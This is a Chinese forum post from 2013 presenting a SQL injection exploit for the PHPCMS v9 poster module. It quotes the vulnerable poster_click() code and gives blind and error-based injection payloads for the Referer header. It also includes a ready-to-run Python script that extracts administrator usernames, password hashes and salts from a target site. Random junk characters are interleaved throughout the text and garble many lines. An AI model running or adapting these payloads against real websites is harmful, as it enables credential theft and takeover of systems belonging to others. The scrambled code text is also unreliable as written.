有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
. y2 D( F, S7 k1 z5 @: K
5 Z2 I' ~& L9 k5 S5 x" a2 Q Y问题函数\phpcms\modules\poster\index.php8 J1 W! b2 s. s, Z
- A' H+ q' c. H
public function poster_click() {
* |4 ?, H1 y- R$ i1 t+ D V( m$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
6 a- c% o, m+ b" ? u2 p$r = $this->db->get_one(array('id'=>$id));1 s3 q& _& L7 M* s
if (!is_array($r) && empty($r)) return false;
5 | H/ w, O! F" k$ip_area = pc_base::load_sys_class('ip_area');/ g t0 J; ^9 @# D" x5 C
$ip = ip();4 u8 W; X/ J6 p- r5 V
$area = $ip_area->get($ip);
1 _' o3 [! t; s0 \: W; j$username = param::get_cookie('username') ? param::get_cookie('username') : '';
+ P1 `* h) l) | ~% Aif($id) {
4 C! @3 M$ i3 n& F$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
. P) O$ i7 f$ E \, U$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
5 a4 N! Y8 o, T* f# Q}
\" J% b; E8 E! ~1 G v) j1 j$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
" R7 o: M" ~( J! p6 x* b5 W$setting = string2array($r['setting']);
$ t" J2 @: H, \9 uif (count($setting)==1) {/ \# k& ~1 Z+ q8 {
$url = $setting['1']['linkurl'];
I* C/ B7 @" }% C} else {
1 |7 i+ Y( J z" }4 G! ]: v$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];' u' a3 u. Y' Q7 o6 E* w
}
: k6 b( m) [7 l9 Q( h$ eheader('Location: '.$url);
4 d% y% r& m0 G4 a. ~}* Z/ w% W) R, u6 s
6 O$ I* V7 O% _3 d
# t z" r! D2 y% M( U7 e1 J
% g0 R5 C+ _ `+ `3 l8 M4 s+ [利用方式:
# y# K% L1 O6 I# s! Y% }6 i8 h+ U3 H2 P1 J
1、可以采用盲注入的手法:1 i6 X( s+ u2 [# K
$ c4 c e b/ N6 @% vreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
) P$ ]. b9 o% H4 J4 N/ m0 I
" J$ x# ~5 R: A; Y {- N通过返回页面,正常与否一个个猜解密码字段。
, g- g, {7 r4 D3 o8 O5 H" u/ |# [& V7 { p/ [/ Q
2、代码是花开写的,随手附上了:( D7 s4 X7 B. ~- D) X) V
) l" O/ Y8 o# i6 B2 R
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#/ N0 X5 F" J* t, E: n
+ T2 m& H* i) L. @此方法是爆错注入手法,原理自查。* |% r2 D1 q2 r1 ]; i/ Q5 [
. m: @1 ^) [1 p) s. L1 U2 n
' ]+ k3 C. C ^5 A1 f
% M" |$ j. N' C利用程序:
1 R* B" W+ k/ V3 I3 u6 j0 S% t- m7 `% ?+ P# _4 r3 r2 ` {" G
#!/usr/bin/env python
8 {, j$ W7 Y* r7 Qimport httplib,sys,re+ R1 l+ l* o6 [( {
! p2 f7 o" ~7 i! N5 {- j% l" hdef attack():
: P. _6 s; E4 r" O4 j3 Mprint “Code by Pax.Mac Team conqu3r!”+ V! d8 J" G/ d
print “Welcome to our zone!!!”
, J1 p/ J) l. l/ I$ K. m, m5 R# Burl=sys.argv[1]( [9 E8 o4 p) a0 e
paths=sys.argv[2]
) W! i) J. I$ b; O. s. pconn = httplib.HTTPConnection(url)
|- l1 A' c8 [1 k! di_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
9 R5 J* e1 ]6 p. u( Z0 T“Accept”: “text/plain”, f% v7 l* s* a
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
+ `6 ^# f3 a& x8 ]# ]3 P: e7 f6 d$ Wconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
6 o h1 W6 C0 h4 I, Ir1 = conn.getresponse()
^# `; T" p+ @- jdatas=r1.read()2 @. }' W' T/ l
datas=re.findall(r”Duplicate entry \’\w+’”, datas)( B6 n* J! @% }. B# M. S+ l0 r ^' V9 A
print datas[0]
. C% } Y$ u, o8 _4 v$ o N& }- iconn.close()5 n/ ]$ O5 T3 C! A* C
if __name__==”__main__”:
5 j/ S. `( ~, t, vif len(sys.argv)<3:' y6 [1 n1 k5 Z# w' M
print “Code by Pax.Mac Team conqu3r”" l9 D3 v' k! T) J
print “Usgae:”
# f& ^) c6 e, s/ {print “ phpcmsattack.py www.paxmac.org /”
P0 h2 h9 P B' \- n" Tprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
3 p$ H' l- [4 {; N3 L/ |1 ssys.exit(1)
2 Q1 {$ M( B! O& `! M F5 H2 cattack()
& ~. O3 S( B/ o3 l* V* f8 j& v! a: e
|
发表于 2013-1-11 21:01:00
收藏
支持
反对